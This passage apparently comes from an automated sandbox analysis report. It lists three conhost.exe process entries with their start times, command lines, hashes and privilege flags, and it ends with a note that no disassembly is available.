                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:52
                                                                                                                                                                                                                                          Start time:11:05:47
                                                                                                                                                                                                                                          Start date:23/12/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:53
                                                                                                                                                                                                                                          Start time:11:05:47
                                                                                                                                                                                                                                          Start date:23/12/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:54
                                                                                                                                                                                                                                          Start time:11:05:47
                                                                                                                                                                                                                                          Start date:23/12/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Disassembly

                                                                                                                                                                                                                                          No disassembly